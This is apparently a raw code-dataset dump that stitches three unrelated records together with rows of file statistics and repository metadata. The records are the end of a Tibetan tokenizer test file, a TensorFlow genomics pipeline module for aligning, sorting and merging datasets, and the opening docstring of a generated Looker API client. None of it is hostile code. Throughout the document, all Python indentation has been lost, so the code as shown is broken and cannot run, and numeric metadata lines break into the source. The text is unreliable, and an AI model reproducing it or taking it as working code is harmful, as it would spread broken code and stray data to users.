tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཟླས་", "བསྐུལ་", "གསུང་"]
def test_missing_token54(wt):
input_str = "བྷ་གར་འཁྱིལ། །ཨོཾ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་", "འཁྱིལ", "། །", "ཨོཾ་"]
def test_missing_token55(wt):
input_str = "བྷ་གར་སྦྱོར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་", "སྦྱོར་"]
def test_missing_token56(wt):
input_str = "བརྒྱུད་སྐུ་གདུང་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྒྱུད་", "སྐུ་གདུང་"]
def test_missing_token57(wt):
input_str = "སྒལ་བརྒྱུད་ཞབས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྒལ་", "བརྒྱུད་", "ཞབས་"]
def test_missing_token58(wt):
input_str = "བརྩེགས་ཆེ་མཆོག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "ཆེ་མཆོག་"]
def test_missing_token59(wt):
input_str = "།་གླེན་ལྐུགས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["།་", "གླེན་ལྐུགས་"]
| 29.394737 | 84 | 0.591226 | 2,348 | 11,170 | 3.014906 | 0.086031 | 0.133352 | 0.116683 | 0.175025 | 0.803221 | 0.762396 | 0.734143 | 0.705184 | 0.662664 | 0.649386 | 0 | 0.012099 | 0.193465 | 11,170 | 379 | 85 | 29.472296 | 0.688201 | 0 | 0 | 0.25 | 0 | 0.003846 | 0.132856 | 0.006088 | 0 | 0 | 0 | 0 | 0.226923 | 1 | 0.226923 | false | 0 | 0.003846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
02ddf278e07df2469425b99e52000fed7ca4b008 | 36,816 | py | Python | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 École Polytechnique Fédérale de Lausanne. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import itertools
import pathlib
from . import app
from modules.snap_align import fused_align_sort, merge as merge_stage, common as snap_common
from common.parse import numeric_min_checker, add_dataset, path_exists_checker, filepath_key
import tensorflow.contrib.gate as gate
import tensorflow as tf
import logging; logging.basicConfig(level=logging.DEBUG)
import tensorflow.contrib.persona as persona
persona_ops = persona.persona_ops()
from string import digits
import json
from .common import make_counter
align_sort_key = "align_sort"
merge_key = "merge"
combo_key = "combo"
performance_name_scope = "performance"
credit_link_end_to_end = "e2e"
credit_link_successive = "linear"
def add_common_args(parser):
parser.add_argument("--align-stages", dest="align_stages", default=0, type=numeric_min_checker(0, "must have at least 1 align fused_align_sort"), help="number of align stages")
parser.add_argument("--merge-stages", dest="merge_stages", default=0, type=numeric_min_checker(0, "must have at least 1 merge fused_align_sort"), help="number of merge stages")
parser.add_argument("--combo-stages", dest="combo_stages", default=0, type=numeric_min_checker(0, "must have non-negative number of combo stages for FAS/M"), help="number of combo fused-align-sort/merge stages")
parser.add_argument("--parallel-open-requests", type=numeric_min_checker(1, "must have at least 1 parallel open request"), help="if specified, the number of parallel open requests")
parser.add_argument("--parallel-open-request-expansion-factor", default=1.5, type=numeric_min_checker(0.1, numeric_type=float, message="must have at least 0.1 expansion factor"),
help="the expansion factor to multiple the number of client slots by to bound the capacity in the global pipeline. Not used if parallel_open_requests is set")
parser.add_argument("--credit-link", default=credit_link_successive, choices=(credit_link_end_to_end, credit_link_successive), help="Type of credit linking to use between successive stages")
parser.add_argument("--align-counters", default=False, action="store_true", help="track the exit rate of the align/sort stages")
parser.add_argument("--merge-counters", default=False, action="store_true", help="track the exit rate of the merge stages")
class AlignSort(app.Application):
ingress_dtypes = (tf.string,)
ingress_shapes = ((),)
@staticmethod
def name():
return "align-sort"
@staticmethod
def help_message():
return "align and sort a dataset using Snap"
class_logger = logging.getLogger(name="AlignClass")
@classmethod
def _make_graph_args(cls, parser):
add_common_args(parser=parser)
parser.add_argument("--log-goodput", default=False, action='store_true', help="turn on all goodput and latency tracing")
fused_align_sort.LocalFusedStage.add_graph_args(parser=parser)
merge_stage.LocalMergeStage.add_graph_args(parser=parser)
fused_align_sort.SmallLocalFusedStage.add_graph_args(parser=parser)
merge_stage.SmallLocalMergeStage.add_graph_args(parser=parser)
@classmethod
def device_counts(cls, args):
return {
align_sort_key: args.align_stages,
merge_key: args.merge_stages,
combo_key: args.combo_stages
}
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
num_merge = args.merge_stages
num_combo = args.combo_stages
num_align = args.align_stages
if (num_merge + num_combo) < 1:
raise Exception("Need >0 merge stages. Got {m} pure merge and {c} combo".format(m=num_merge, c=num_combo))
if (num_align + num_combo) < 1:
raise Exception("Need >0 align stages. Got {a} pure align stages and {c} combo".format(a=num_align, c=num_combo))
if args.parallel_open_requests is not None:
capacity_between_gates = args.parallel_open_requests
else:
capacity_between_gates = int(num_client_slots * args.parallel_open_request_expansion_factor)
if capacity_between_gates < 1:
raise Exception("Capacity between gates is <1 ({c})".format(c=capacity_between_gates))
args.parallel_open_requests = capacity_between_gates
self.log.info("Capacity between gates: {}".format(capacity_between_gates))
with tf.name_scope(gate_name):
ingress = gate.IngressGate(dtypes=self.ingress_dtypes, shapes=self.ingress_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
with tf.name_scope("align_sort_stage"):
align_stages = tuple(fused_align_sort.LocalFusedStage(args=args) for _ in range(num_align))
small_align_stages = tuple(fused_align_sort.SmallLocalFusedStage(args=args) for _ in range(num_combo))
def make_align_stages(stages, align_devices):
for stage, device in zip(align_stages, align_devices):
with device():
device_graph = stage.make_graph(upstream_gate=ingress)
try: # convert to a tuple if it returns a generator
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
assert len(stage.run_first) > 0
for item in stage.run_first:
self._add_run_first(tensor=item)
yield device_graph
outputs = tuple(itertools.chain.from_iterable(
make_align_stages(stages=s, align_devices=devices) for s, devices in (
(align_stages, device_map.get(align_sort_key, None)),
(small_align_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(outputs) == num_align + num_combo, "Expected {e} align stage ({a} pure align and {c} combo) but only got {actual}".format(
e=num_align+num_combo, a=num_align, c=num_combo, actual=len(outputs))
outputs = tuple(itertools.chain.from_iterable(outputs)) # flattens it
example_output = outputs[0]
if args.credit_link == credit_link_end_to_end:
merge_gate_kwargs = {
"limit_upstream": False,
"limit_downstream": False
}
else:
merge_gate_kwargs = {
"capacity": capacity_between_gates
}
with tf.name_scope("inter_stage_gate"):
gate_name = "ready_to_merge"
merge_gate = gate.StreamingGate(
sample_tensors=example_output[1:-1],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name,
**merge_gate_kwargs
)
enqueue_ops = tuple(merge_gate.enqueue(id_and_count=a[0], components=a[1:-1]) for a in outputs)
if args.align_counters:
if getattr(args, "summary", False):
with tf.name_scope(None): # clears this out of the inter_stage_gate scope
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="sorted_counter",
summary_name="sorted_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[-1] for a in outputs)
)))
else:
self.log.warning("Align counters requested, but no summary was requested. Please enable summary for this to work.")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=merge_gate, enqueue_ops=enqueue_ops, device=merge_gate.device))
if args.credit_link == credit_link_successive:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=merge_gate)
with tf.name_scope("merge_stage"):
merge_stages = tuple(merge_stage.LocalMergeStage(args=args) for _ in range(num_merge))
small_merge_stages = tuple(merge_stage.SmallLocalMergeStage(args=args) for _ in range(num_combo))
def make_merge_stages(stages, merge_devices):
for stage, device in zip(merge_stages, merge_devices):
with device():
device_graph = stage.make_graph(upstream_gate=merge_gate)
try:
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
yield device_graph
merge_stage_outputs = tuple(itertools.chain.from_iterable(
make_merge_stages(stages=s, merge_devices=devices) for s, devices in (
(merge_stages, device_map.get(merge_key, None)),
(small_merge_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(merge_stage_outputs) == num_merge + num_combo, "Expected {e} merge devices ({p} pure merge and {c} combo}, but only got {actual}".format(
p=num_merge, c=num_combo, e=num_merge+num_combo, actual=len(merge_stage_outputs)
)
merge_stage_outputs = tuple(itertools.chain.from_iterable(merge_stage_outputs)) # flattens it
example_output = merge_stage_outputs[0]
gate_name = "egress_gate"
with tf.name_scope(gate_name):
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output[1:],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name)
enqueue_ops = tuple(egress.enqueue(id_and_count=a[0], components=a[1:]) for a in merge_stage_outputs)
if args.merge_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="merged_counter",
summary_name="merged_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[3] for a in merge_stage_outputs)
)))
else:
self.log.warning("Merge counters requested, but no summary was requested. Please enable summary for this to work")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops, device=egress.device))
if args.credit_link == credit_link_end_to_end:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
else:
gate.add_credit_supplier_from_gates(upstream_gate=merge_gate, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
with tf.name_scope("client_slots"):
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.ingress_shapes)
for idx in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape, name="client_slot_{}".format(idx)) for dtype, shape in zip(self.ingress_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders, name="ingress_enqueue_{}".format(idx))
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue, name="egress_dequeue_{}".format(idx))
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
# TODO assume that for now it is just the local filesystem. Will need to differentiate for other stuff later
add_dataset(parser=parser)
parser.add_argument("-d", "--dataset-dir", type=path_exists_checker(), help="Directory containing ALL of the chunk files")
parser.add_argument("--overwrite", default=False, action="store_true", help="Overwrite existing metadata file when the pipeline finishes. Default: create a new one")
@classmethod
def process_ingress_args(cls, args):
dataset_dir = args.dataset_dir
if dataset_dir is None:
metadata_path = args.dataset[filepath_key]
dataset_dir = metadata_path.parent
files_to_remove = tuple(itertools.chain(dataset_dir.glob("*.results"), dataset_dir.glob("*.secondary*"),
dataset_dir.glob("*intermediate*")))
if len(files_to_remove) > 0:
cls.class_logger.info("Removing prior results before aligning: {}".format(", ".join(str(a) for a in files_to_remove)))
for f in files_to_remove:
if f.exists(): # globs may have overwritten each other
assert f.is_file()
f.unlink()
if len(args.dataset["records"]) == 0:
raise ValueError("Dataset must have non-zero number of records")
return tuple(str((dataset_dir / record["path"]).absolute()) for record in args.dataset["records"])
@classmethod
def process_egress_results(cls, results, args):
"""
:param results: a list of [ [ names, of, intermediate, files] ]
:param args:
:return:
"""
def get_result_columns(path_columns):
a = set()
for path_column in path_columns:
path = pathlib.PurePath(path_column[0])
extension = path.suffix[1:] # strip the leading dot
if extension in a:
raise Exception("Runtime error: extension '{e}' already in a column. Columns: {c}".format(
e=extension, c=", ".join(x for x in a)
))
a.add(extension)
for other_column in path_column[1:]:
other_path = pathlib.PurePath(other_column)
other_extension = other_path.suffix[1:]
if other_extension != extension:
raise Exception("Expected all column extensions to match. Expected '{exp}', but got '{actual}'".format(
exp=extension, actual=other_extension
))
return a
record_ids, first_ordinals, num_recordz, file_basenames = results[:4]
full_file_pathz = results[4:]
dataset = args.dataset
output_filepath = dataset.pop(filepath_key)
processed_columns = get_result_columns(path_columns=full_file_pathz)
columns = set(dataset["columns"])
if not columns.issubset(processed_columns):
raise Exception("Expected more columns, but got fewer. Before: [{before}], After: [{after}]".format(
before=", ".join(columns), after=", ".join(processed_columns)
))
if snap_common.results_extension not in processed_columns:
raise Exception("Expected extension '{res_ext}' in the results extensions, but didn't find it.".format(res_ext=snap_common.results_extension))
only_secondary = processed_columns.difference({snap_common.results_extension,
snap_common.base_extension,
snap_common.metadata_extension,
snap_common.qual_extension})
for res_ext in only_secondary:
stripped = res_ext.translate({ord(k): None for k in digits})
if stripped != snap_common.secondary_results_extension:
raise Exception("Secondary or unknown results extension found: '{found}'".format(found=res_ext))
merge_att = "_".join((merge_stage.LocalMergeStage.local_dest, "make_new"))
overwrite = args.overwrite or (hasattr(args, merge_att) and not getattr(args, merge_att))
if not overwrite:
filename = output_filepath.stem
file_dir = output_filepath.parent
output_filepath = file_dir / (filename+"_sorted"+output_filepath.suffix)
if output_filepath.exists():
cls.class_logger.warning("Output metadata path '{p}' exists. Will overwrite!".format(p=str(output_filepath)))
columns_to_add = sorted(tuple(processed_columns.difference(columns)))
dataset["columns"].extend(columns_to_add)
first_record_id = record_ids[0]
if not all(f == first_record_id for f in record_ids[1:]):
raise Exception("Not all record IDs are equal: [{rids}]".format(rids=", ".join(record_ids)))
if first_record_id != dataset["name"]:
cls.class_logger.warning("Input metadata specified a record id of '{metadata_version}', but pipeline output '{new_version}'. Overwriting with {new_version}.".format(
metadata_version=dataset["name"], new_version=first_record_id
))
dataset["name"] = first_record_id
as_keys = (pathlib.PurePath(a).stem for a in file_basenames)
new_records = [
{
"path": path,
"first": first_ordinal,
"last": first_ordinal + num_records
} for path, first_ordinal, num_records in zip(as_keys, first_ordinals, num_recordz)
]
dataset["records"] = new_records
with output_filepath.open("w+") as f:
json.dump(dataset, f, indent=4)
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
results = tuple(sess.run(egress_dequeue, feed_dict={ingress_placeholder: tuple(str(c) for c in client_args)}))
record_ids, first_ordinals, num_recordz, file_basenames = results[:4]
full_file_pathz = tuple(results[4:])
utf8 = "utf-8"
new_record_ids = tuple(i.decode(utf8) for i in record_ids)
new_first_ordinals = tuple(int(i) for i in first_ordinals)
new_num_recordz = tuple(int(i) for i in num_recordz)
new_file_basenames = tuple(i.decode(utf8) for i in file_basenames)
new_full_file_pathz = tuple(
tuple(b.decode(utf8) for b in ffp)
for ffp in full_file_pathz
)
return (new_record_ids, new_first_ordinals, new_num_recordz, new_file_basenames) + new_full_file_pathz
def stop(self, sess):
try:
sess.run(self.close_op)
except Exception as e:
self.log.error("{nm} closing. Got exception '{e}'".format(e=e, nm=self.name()))
class CephAlignSort(app.Application):
ingress_dtypes = (tf.string,)
ingress_shapes = ((2),)
@staticmethod
def name():
return "ceph-align-sort"
@staticmethod
def help_message():
return "align a ceph dataset using Snap"
class_logger = logging.getLogger(name="CephAlignClass")
@classmethod
def _make_graph_args(cls, parser):
add_common_args(parser=parser)
parser.add_argument("--log-goodput", default=False, action='store_true', help="turn on all goodput and latency tracing")
fused_align_sort.CephFusedStage.add_graph_args(parser=parser)
merge_stage.CephMergeStage.add_graph_args(parser=parser)
fused_align_sort.SmallCephFusedStage.add_graph_args(parser=parser)
merge_stage.SmallCephMergeStage.add_graph_args(parser=parser)
@classmethod
def device_counts(cls, args):
return {
align_sort_key: args.align_stages,
merge_key: args.merge_stages,
combo_key: args.combo_stages
}
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
num_merge = args.merge_stages
num_combo = args.combo_stages
num_align = args.align_stages
if (num_merge + num_combo) < 1:
raise Exception("Need >0 merge stages. Got {m} pure merge and {c} combo".format(m=num_merge, c=num_combo))
if (num_align + num_combo) < 1:
raise Exception("Need >0 align stages. Got {a} pure align stages and {c} combo".format(a=num_align, c=num_combo))
if args.parallel_open_requests is not None:
capacity_between_gates = args.parallel_open_requests
else:
capacity_between_gates = int(num_client_slots * args.parallel_open_request_expansion_factor)
if capacity_between_gates < 1:
raise Exception("Capacity between gates is <1 ({c})".format(c=capacity_between_gates))
args.parallel_open_requests = capacity_between_gates
self.log.info("Capacity between gates: {}".format(capacity_between_gates))
with tf.name_scope(gate_name):
ingress = gate.IngressGate(dtypes=self.ingress_dtypes, shapes=self.ingress_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
with tf.name_scope("align_sort_stage"):
align_stages = tuple(fused_align_sort.CephFusedStage(args=args) for _ in range(num_align))
small_align_stages = tuple(fused_align_sort.SmallCephFusedStage(args=args) for _ in range(num_combo))
def make_align_stages(stages, align_devices):
for stage, device in zip(stages, align_devices):
with device():
device_graph = stage.make_graph(upstream_gate=ingress)
try: # convert to a tuple if it returns a generator
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
assert len(stage.run_first) > 0
for item in stage.run_first:
self._add_run_first(tensor=item)
yield device_graph
outputs = tuple(itertools.chain.from_iterable(
make_align_stages(stages=s, align_devices=devices) for s, devices in (
(align_stages, device_map.get(align_sort_key, None)),
(small_align_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(outputs) == num_align + num_combo, "Expected {e} align stage ({a} pure align and {c} combo) but only got {actual}".format(
e=num_align+num_combo, a=num_align, c=num_combo, actual=len(outputs))
outputs = tuple(itertools.chain.from_iterable(outputs)) # flattens it
example_output = outputs[0]
if args.credit_link == credit_link_end_to_end:
merge_gate_kwargs = {
"limit_upstream": False,
"limit_downstream": False
}
else:
merge_gate_kwargs = {
"capacity": capacity_between_gates
}
with tf.name_scope("inter_stage_gate"):
gate_name = "ready_to_merge"
merge_gate = gate.StreamingGate(
sample_tensors=example_output[1:-1],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name,
**merge_gate_kwargs
)
enqueue_ops = tuple(merge_gate.enqueue(id_and_count=a[0], components=a[1:-1]) for a in outputs)
if args.align_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="sorted_counter",
summary_name="sorted_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[-1] for a in outputs)
)))
else:
self.log.warning("Align counters requested, but no summary was requested. Please enable summary for this to work")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=merge_gate, enqueue_ops=enqueue_ops, device=merge_gate.device))
if args.credit_link == credit_link_successive:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=merge_gate)
with tf.name_scope("merge_stage"):
merge_stages = tuple(merge_stage.CephMergeStage(args=args) for _ in range(args.merge_stages))
small_merge_stages = tuple(merge_stage.SmallCephMergeStage(args=args) for _ in range(num_combo))
def make_merge_stages(stages, merge_devices):
for stage, device in zip(stages, merge_devices):
with device():
device_graph = stage.make_graph(upstream_gate=merge_gate)
try:
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
yield device_graph
merge_stage_outputs = tuple(itertools.chain.from_iterable(
make_merge_stages(stages=s, merge_devices=devices) for s, devices in (
(merge_stages, device_map.get(merge_key, None)),
(small_merge_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(merge_stage_outputs) == num_merge + num_combo, "Expected {e} merge devices ({p} pure merge and {c} combo}, but only got {actual}".format(
p=num_merge, c=num_combo, e=num_merge+num_combo, actual=len(merge_stage_outputs)
)
merge_stage_outputs = tuple(itertools.chain.from_iterable(merge_stage_outputs)) # flattens it
example_output = merge_stage_outputs[0]
gate_name = "egress_gate"
with tf.name_scope(gate_name):
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output.components,
id_and_count_upstream=example_output.id_and_count, join=True,
name=gate_name, shared_name=gate_name)
enqueue_ops = tuple(egress.enqueue(id_and_count=a.id_and_count, components=a.components) for a in merge_stage_outputs)
if args.merge_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="merged_counter",
summary_name="merged_num_records",
deps_and_counters=zip(
enqueue_ops,
(a.components[2] for a in merge_stage_outputs)
)))
else:
self.log.warning("Merge counters requested, but no summary was requested. Please enable summary for this to work")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops,
device=egress.device))
if args.credit_link == credit_link_end_to_end:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
else:
gate.add_credit_supplier_from_gates(upstream_gate=merge_gate, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
with tf.name_scope("client_slots"):
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.ingress_shapes)
for idx in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape, name="client_slot_{}".format(idx)) for dtype, shape in zip(self.ingress_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders, name="ingress_enqueue_{}".format(idx))
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue, name="egress_dequeue_{}".format(idx))
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
add_dataset(parser=parser)
parser.add_argument("--overwrite", default=False, action="store_true", help="Overwrite existing metadata file when the pipeline finishes. Default: create a new one")
parser.add_argument("--namespace", default="", help="the namespace to access this dataset")
parser.add_argument("--use-default-namespace", default=False, action="store_true", help="use the name of this record as the namespace")
@classmethod
def process_ingress_args(cls, args):
dataset = args.dataset
if args.use_default_namespace:
namespace = dataset["name"]
else:
namespace = args.namespace
if namespace == "":
cls.class_logger.warning("Dataset {rid} has no namespace specified!".format(rid=dataset["name"]))
record_keys = (a["path"] for a in dataset["records"])
return tuple(zip(record_keys, itertools.repeat(namespace)))
@classmethod
def process_egress_results(cls, results, args):
"""
:param results: a list of [ [ names, of, intermediate, files] ]
:param args:
:return:
"""
def get_result_columns(key_columns):
a = set()
for key_column in key_columns:
decoded_key = key_column[0]
split = decoded_key.split(".")
assert len(split) == 2
extension = split[1]
if extension in a:
raise Exception("Runtime error: extension '{e}' already in a column. Columns: {c}".format(
e=extension, c=", ".join(x for x in a)
))
a.add(extension)
for other_column in key_column[1:]:
other_decoded_key = other_column
other_split = other_decoded_key.split(".")
assert len(other_split) == 2
other_extension = other_split[1]
if other_extension != extension:
raise Exception("Expected all column extensions to match. Expected '{exp}', but got '{actual}'".format(
exp=extension, actual=other_extension
))
return a
record_ids, first_ordinals, num_recordz, keys, namespaces = results[:5]
full_keys_records = results[5:]
dataset = args.dataset
output_filepath = dataset.pop(filepath_key)
processed_columns = get_result_columns(key_columns=full_keys_records)
columns = set(dataset["columns"])
if not columns.issubset(processed_columns):
raise Exception("Expected more columns, but got fewer. Before: [{before}], After: [{after}]".format(
before=", ".join(columns), after=", ".join(processed_columns)
))
if snap_common.results_extension not in processed_columns:
raise Exception("Expected extension '{res_ext}' in the results extensions, but didn't find it.".format(res_ext=snap_common.results_extension))
only_secondary = processed_columns.difference({snap_common.results_extension,
snap_common.base_extension,
snap_common.metadata_extension,
snap_common.qual_extension})
for res_ext in only_secondary:
stripped = res_ext.translate({ord(k): None for k in digits})
if stripped != snap_common.secondary_results_extension:
raise Exception("Secondary or unknown results extension found: '{found}'".format(found=res_ext))
merge_att = "_".join((merge_stage.CephMergeStage.local_dest, "make_new"))
overwrite = args.overwrite or (hasattr(args, merge_att) and not getattr(args, merge_att))
if not overwrite:
filename = output_filepath.stem
file_dir = output_filepath.parent
output_filepath = file_dir / (filename+"_sorted"+output_filepath.suffix)
if output_filepath.exists():
cls.class_logger.warning("Output metadata path '{p}' exists. Will overwrite!".format(p=str(output_filepath)))
columns_to_add = sorted(tuple(processed_columns.difference(columns)))
dataset["columns"].extend(columns_to_add)
first_record_id = record_ids[0]
if not all(f == first_record_id for f in record_ids[1:]):
raise Exception("Not all record IDs are equal: [{rids}]".format(rids=", ".join(record_ids)))
if first_record_id != dataset["name"]:
cls.class_logger.warning("Input metadata specified a record id of '{metadata_version}', but pipeline output '{new_version}'. Overwriting with {new_version}.".format(
metadata_version=dataset["name"], new_version=first_record_id
))
dataset["name"] = first_record_id
new_records = [
{
"path": path,
"first": first_ordinal,
"last": first_ordinal + num_records
} for path, first_ordinal, num_records in zip(keys, first_ordinals, num_recordz)
]
dataset["records"] = new_records
with output_filepath.open("w+") as f:
json.dump(dataset, f, indent=4)
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
results = sess.run(egress_dequeue, feed_dict={ingress_placeholder: client_args})
record_ids, first_ordinals, num_recordz, keys, namespaces = results[:5]
full_keys_records = results[5:]
utf8 = "utf-8"
new_record_ids = tuple(i.decode(utf8) for i in record_ids)
new_first_ordinals = tuple(int(i) for i in first_ordinals)
new_num_recordz = tuple(int(i) for i in num_recordz)
new_keys = tuple(i.decode(utf8) for i in keys)
new_namespaces = tuple(i.decode(utf8) for i in namespaces)
new_full_keys_records = tuple(
tuple(b.decode(utf8) for b in ffp)
for ffp in full_keys_records
)
return (new_record_ids, new_first_ordinals, new_num_recordz, new_keys, new_namespaces) + new_full_keys_records
def stop(self, sess):
try:
sess.run(self.close_op)
except Exception as e:
self.log.error("{nm} closing. Got exception '{e}'".format(e=e, nm=self.name()))
| 55.279279 | 215 | 0.614923 | 4,360 | 36,816 | 4.930046 | 0.098165 | 0.013492 | 0.02047 | 0.013957 | 0.825448 | 0.804466 | 0.792603 | 0.780368 | 0.754222 | 0.753617 | 0 | 0.004119 | 0.29441 | 36,816 | 665 | 216 | 55.362406 | 0.823344 | 0.032649 | 0 | 0.737303 | 0 | 0.012259 | 0.130632 | 0.004872 | 0 | 0 | 0 | 0.001504 | 0.015762 | 1 | 0.047285 | false | 0 | 0.021016 | 0.010508 | 0.103328 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
02f83bb2d26b330565712f0e7a883212ba1ff907 | 47,678 | py | Python | lookerapi/apis/look_api.py | jcarah/python_sdk | 3bff34d04a828c940c3f93055e10b6a0095c2327 | [
"MIT"
] | null | null | null | lookerapi/apis/look_api.py | jcarah/python_sdk | 3bff34d04a828c940c3f93055e10b6a0095c2327 | [
"MIT"
] | null | null | null | lookerapi/apis/look_api.py | jcarah/python_sdk | 3bff34d04a828c940c3f93055e10b6a0095c2327 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Looker API 3.1 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. Note! With great power comes great responsibility: The \"Try It Out!\" button makes API calls to your live Looker instance. Be especially careful with destructive API operations such as `delete_user` or similar. There is no \"undo\" for API operations. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning (but we will try to avoid doing that). Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) This **API 3.1** is in active development. This is where support for new Looker features will appear as non-breaking additions - new functions, new optional parameters on existing functions, or new optional properties in existing types. Additive changes should not impact your existing application code that calls the Looker API. Your existing application code will not be aware of any new Looker API functionality until you choose to upgrade your app to use a newer Looker API client SDK release. The following are a few examples of noteworthy items that have changed between API 3.0 and API 3.1. For more comprehensive coverage of API changes, please see the release notes for your Looker release. ### Examples of new things added in API 3.1: * Dashboard construction APIs * Themes and custom color collections APIs * Create and run SQL_runner queries * 